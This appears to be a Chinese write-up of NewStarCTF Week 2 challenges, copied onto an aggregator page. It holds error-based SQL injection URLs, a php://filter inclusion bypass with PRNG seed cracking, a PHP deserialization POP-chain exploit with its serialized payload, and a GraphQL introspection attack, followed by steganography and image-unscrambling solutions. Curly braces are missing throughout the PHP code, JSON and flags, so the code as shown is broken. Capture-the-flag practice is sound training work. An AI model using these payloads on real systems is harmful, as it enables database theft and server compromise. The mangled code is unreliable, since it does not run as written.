BUUCTF NewStarCTF 公开赛赛道Week2 Writeup

Posted 末初mochu7

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF NewStarCTF 公开赛赛道Week2 Writeup相关的知识,希望对你有一定的参考价值。

文章目录


WEEK2

WEB

Word-For-You(2 Gen)

题目描述

哇哇哇,我把查询界面改了,现在你们不能从数据库中拿到东西了吧哈哈(不过为了调试的代码似乎忘记删除了

报错注入

/comments.php?name=1'and updatexml(1,concat(0x7e,database(),0x7e),1)--+
Current Database: wfy
/comments.php?name=1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

/comments.php?name=1'and updatexml(1,concat(0x7e,(select right(group_concat(table_name),30) from information_schema.tables where table_schema=database()),0x7e),1)--+
Tables in database(wfy): wfy_admin,wfy_comments,wfy_information
/comments.php?name=1'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='wfy_comments'),0x7e),1)--+
Columns in table(wfy_comments): id,text,user,name,display
/comments.php?name=1'and updatexml(1,concat(0x7e,(select right(group_concat(text),30) from wfy.wfy_comments),0x7e),1)--+

IncludeOne

 <?php
highlight_file(__FILE__);
error_reporting(0);
include("seed.php");
//mt_srand(*********);
echo "Hint: ".mt_rand()."<br>";
if(isset($_POST['guess']) && md5($_POST['guess']) === md5(mt_rand()))
    if(!preg_match("/base|\\.\\./i",$_GET['file']) && preg_match("/NewStar/i",$_GET['file']) && isset($_GET['file']))
        //flag in `flag.php`
        include($_GET['file']);
    else
        echo "Baby Hacker?";
    
else
    echo "No Hacker!";
 Hint: 1219893521

首先爆破伪随机数:https://www.openwall.com/php_mt_seed/

root@mochu7-pc:/mnt/d/Tools/Web/CTF/php_mt_seed# ./php_mt_seed 1219893521
Pattern: EXACT
Version: 3.0.7 to 5.2.0
Found 0, trying 0xfc000000 - 0xffffffff, speed 18382.0 Mseeds/s
Version: 5.2.1+
Found 0, trying 0x00000000 - 0x01ffffff, speed 0.0 Mseeds/s
seed = 0x0011793a = 1145146 (PHP 7.1.0+)
Found 1, trying 0x16000000 - 0x17ffffff, speed 183.6 Mseeds/s
seed = 0x161c5abb = 370956987 (PHP 5.2.1 to 7.0.x; HHVM)
Found 2, trying 0x64000000 - 0x65ffffff, speed 177.0 Mseeds/s
seed = 0x64a22f28 = 1688350504 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0x64a22f28 = 1688350504 (PHP 7.1.0+)
Found 4, trying 0xc4000000 - 0xc5ffffff, speed 170.5 Mseeds/s
seed = 0xc4b59923 = 3300235555 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0xc4b59923 = 3300235555 (PHP 7.1.0+)
seed = 0xc4efe664 = 3304056420 (PHP 5.2.1 to 7.0.x; HHVM)
seed = 0xc4efe664 = 3304056420 (PHP 7.1.0+)
Found 8, trying 0xfe000000 - 0xffffffff, speed 168.2 Mseeds/s
Found 8
PS C:\\Users\\Administrator\\Downloads> php -r "mt_srand(1145146);mt_rand();var_dump(mt_rand());"
Command line code:1:
int(1202031004)

第二层使用伪协议,php://filter/协议自带一层url解码,这样双层url编码可以绕这里的过滤,至于NewStar关键字可以用管道符分隔开用作过滤器(错误的过滤器也不会报错)

/?file=php://filter/read=convert.ba%25%37%33e64-encode|NewStar/resource=flag.php

guess=1202031004

PS C:\\Users\\Administrator\\Downloads> php -r "var_dump(base64_decode('PD9waHAgLy9mbGFnezc4YWY5ZjhhLTljMGUtNDJmNS1hYmY5LWFkOWUyY2FhZjE0Nn0K'));"
Command line code:1:
string(51) "<?php //flag78af9f8a-9c0e-42f5-abf9-ad9e2caaf146
"

UnserializeOne

 <?php
error_reporting(0);
highlight_file(__FILE__);
class Start
    public $name;
    protected $func;

    public function __destruct()
    
        echo "Welcome to NewStarCTF, ".$this->name;
    

    public function __isset($var)
    
        ($this->func)();
    


class Sec
    private $obj;
    private $var;

    public function __toString()
    
        $this->obj->check($this->var);
        return "CTFers";
    

    public function __invoke()
    
        echo file_get_contents('/flag');
    


class Easy
    public $cla;

    public function __call($fun, $var)
    
        $this->cla = clone $var[0];
    


class eeee
    public $obj;

    public function __clone()
    
        if(isset($this->obj->cmd))
            echo "success";
        
    


if(isset($_POST['pop']))
    unserialize($_POST['pop']);

POP链

Sec::__invoke() <- Start::__isset() <- eeee::__clone() <- Easy::__call() <- Sec::__toString() <- Start::__destruct()
<?php 
class Start
    public $name;
    public $func;


class Sec
    public $obj;
    public $var;


class Easy
    public $cla;


class eeee
    public $obj;

$start = new Start();
$sec = new Sec();
$easy = new Easy();
$eeee = new eeee();
$eeee->obj = $start;
$sec->obj = $easy;
$sec->var = $eeee;
$start->name = $sec;
$start->func = $sec;
echo serialize($start);
 ?>
O:5:"Start":2:s:4:"name";O:3:"Sec":2:s:3:"obj";O:4:"Easy":1:s:3:"cla";N;s:3:"var";O:4:"eeee":1:s:3:"obj";r:1;s:4:"func";r:2;

ezAPI


www.zip提供了源码

<?php
                error_reporting(0);
                $id = $_POST['id'];
                function waf($str)
                
                    if (!is_numeric($str) || preg_replace("/[0-9]/", "", $str) !== "") 
                        return False;
                     else 
                        return True;
                    
                

                function send($data)
                
                    $options = array(
                        'http' => array(
                            'method' => 'POST',
                            'header' => 'Content-type: application/json',
                            'content' => $data,
                            'timeout' => 10 * 60
                        )
                    );
                    $context = stream_context_create($options);
                    $result = file_get_contents("http://graphql:8080/v1/graphql", false, $context);
                    return $result;
                

                if (isset($id)) 
                    if (waf($id)) 
                        isset($_POST['data']) ? $data = $_POST['data'] : $data = '"query":"query\\nusers_user_by_pk(id:' . $id . ') \\nname\\n\\n\\n", "variables":null';
                        $res = json_decode(send($data));
                        if ($res->data->users_user_by_pk->name !== NULL) 
                            echo "ID: " . $id . "<br>Name: " . $res->data->users_user_by_pk->name;
                         else 
                            echo "<b>Can't found it!</b><br><br>DEBUG: ";
                            var_dump($res->data);
                        
                     else 
                        die("<b>Hacker! Only Number!</b>");
                    
                 else 
                    die("<b>No Data?</b>");
                
                ?>

$_POST['data']可以传入GraphQL查询语句

开启了Debug模式,由于GraphQL自带强大的内省自检机制,可以查询出GraphQL中所有的QueryMutaionObjectTypeFieldArguments

id=1&data="query":"\\n    query IntrospectionQuery \\r\\n      __schema \\r\\n        queryType  name \\r\\n        mutationType  name \\r\\n        subscriptionType  name \\r\\n        types \\r\\n          ...FullType\\r\\n        \\r\\n        directives \\r\\n          name\\r\\n          description\\r\\n          locations\\r\\n          args \\r\\n            ...InputValue\\r\\n          \\r\\n        \\r\\n      \\r\\n    \\r\\n\\r\\n    fragment FullType on __Type \\r\\n      kind\\r\\n      name\\r\\n      description\\r\\n      fields(includeDeprecated: true) \\r\\n        name\\r\\n        description\\r\\n        args \\r\\n          ...InputValue\\r\\n        \\r\\n        type \\r\\n          ...TypeRef\\r\\n        \\r\\n        isDeprecated\\r\\n        deprecationReason\\r\\n      \\r\\n      inputFields \\r\\n        ...InputValue\\r\\n      \\r\\n      interfaces \\r\\n        ...TypeRef\\r\\n      \\r\\n      enumValues(includeDeprecated: true) \\r\\n        name\\r\\n        description\\r\\n        isDeprecated\\r\\n        deprecationReason\\r\\n      \\r\\n      possibleTypes \\r\\n        ...TypeRef\\r\\n      \\r\\n    \\r\\n\\r\\n    fragment InputValue on __InputValue \\r\\n      name\\r\\n      description\\r\\n      type  ...TypeRef \\r\\n      defaultValue\\r\\n    \\r\\n\\r\\n    fragment TypeRef on __Type \\r\\n      kind\\r\\n      name\\r\\n      ofType \\r\\n        kind\\r\\n        name\\r\\n        ofType \\r\\n          kind\\r\\n          name\\r\\n          ofType \\r\\n            kind\\r\\n            name\\r\\n            ofType \\r\\n              kind\\r\\n              name\\r\\n              ofType \\r\\n                kind\\r\\n                name\\r\\n                ofType \\r\\n                  kind\\r\\n                  name\\r\\n                  ofType \\r\\n                    kind\\r\\n                    name\\r\\n                  \\r\\n                \\r\\n              \\r\\n            \\r\\n          \\r\\n        \\r\\n      \\r\\n    \\r\\n  ","variables":null

右键查看源码


直接关键字搜索flag,找到了ffffllllaaagggg_1n_h3r3_flagflag字段,尝试直接查询

id=1&data="query":"queryffffllllaaagggg_1n_h3r3_flagflag"

MISC

Yesec no drumsticks 2


零宽度字符隐写:https://330k.github.io/misc_tools/unicode_steganography.html


Base家族识别:https://basecrack.herokuapp.com/

>>> bytes.fromhex('666c61677b496e6772336431656e745f30465f59657365635f69355f4f4f4f4f4f7d')
b'flagIngr3d1ent_0F_Yesec_i5_OOOOO'

Coldwinds’s Desktop

montage *.PNG -tile 12x12 -geometry 30x30+0+0 flag.png
gaps --image=flag.png --generations=50 --population=144 --size=30 --verbose



flagY0u_successfu11y_s01ved_the_puzz1e

奇怪的二维码


很明显是一种QR Code,但是使用这个:https://products.aspose.app/barcode/recognize#/recognized
识别不出来

code.png末尾附加了一张PNG图片





PS加上中间的定位符就行


然后用这个站:https://products.aspose.app/barcode/recognize#/recognized

识别就行了

flagAztec_from_Age_0f_Empires

qsdz’s girlfriend 2

题目描述

据说qsdz的girlfriend是会变化的猫猫。flag图片中的文字

猫变换

from PIL import Image

img = Image.open('girlfriend.png')
if img.mode == "P":
    img = img.convert("RGB")
assert img.size[0] == img.size[1]
dim = width, height = img.size

st = 0x61
a = 0x726e
b = 0x6f6c64
for _ in range(st):
    with Image.new(img.mode, dim) as canvas:
        for nx in range(img.size[0]):
            for ny in range(img.size[0]):
                y = (ny - nx * a) % width
                x = (nx - y * b) % height
                canvas.putpixel((y, x), img.getpixel((ny, nx)))
canvas.show()
canvas.save('flag.png')

flag按理说这个点猪也该醒了

奇怪的波形

题目描述

Coldwinds捕获到一段奇怪的波形,好像是某种加密算法的能量损耗, 你能帮他破译出加密算法的key吗? flag:flagkey

以上是关于BUUCTF NewStarCTF 公开赛赛道Week2 Writeup的主要内容,如果未能解决你的问题,请参考以下文章

BUUCTF NewStarCTF 公开赛赛道Week5 Writeup

BUUCTF NewStarCTF 公开赛赛道Week3 Writeup

BUUCTF NewStarCTF 公开赛赛道Week3 Writeup

BUUCTF NewStarCTF 公开赛赛道Week3 Writeup

BUUCTF NewStarCTF 公开赛赛道Week3 Writeup

BUUCTF NewStarCTF 公开赛赛道Week4 Writeup